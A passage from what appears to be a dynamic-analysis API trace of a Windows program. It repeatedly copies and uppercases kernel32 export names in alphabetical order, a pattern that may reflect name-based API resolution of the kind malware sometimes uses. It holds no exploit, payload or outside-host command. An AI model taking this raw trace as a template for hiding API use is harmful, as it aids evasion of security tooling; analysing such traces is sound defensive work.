(lpString="BUILDCOMMDCBW") returned 13 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.474] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.474] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.474] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.474] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.474] lstrlenA (lpString="CANCELIO") returned 8 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.474] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.474] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.474] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.474] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.474] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.474] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.474] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.474] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.474] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.475] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.475] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.475] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.475] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.475] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.475] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.475] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.475] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.475] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.475] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.475] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.475] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.475] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.475] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.475] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.475] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.475] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.475] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.475] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.476] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.476] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.476] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.476] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.476] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.476] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.476] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.476] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.476] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.476] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.476] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.476] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.476] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.476] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.476] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.476] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.476] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.476] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.476] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.477] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.477] lstrlenA (lpString="COPYFILEA") returned 9 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.477] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.477] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.477] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.477] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.477] lstrlenA (lpString="COPYFILEW") returned 9 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.477] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.477] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.477] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.477] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.477] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.477] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.477] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.477] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.477] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.477] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.477] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.477] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.478] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.478] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.478] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.478] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.478] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.478] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.478] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.478] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.478] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.478] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.478] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.478] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.478] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.478] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.478] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.478] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.478] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.478] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.479] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.479] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.479] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.479] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.479] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.479] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.479] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.479] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.479] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.479] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.479] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.479] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.479] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.479] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.479] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.479] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.479] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.479] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.479] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.480] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.480] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.480] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.480] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.480] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.480] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.480] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.480] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.480] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.480] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.480] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.480] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.480] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.480] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.480] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.480] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.480] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.480] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.481] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.481] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.481] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.481] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.481] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") 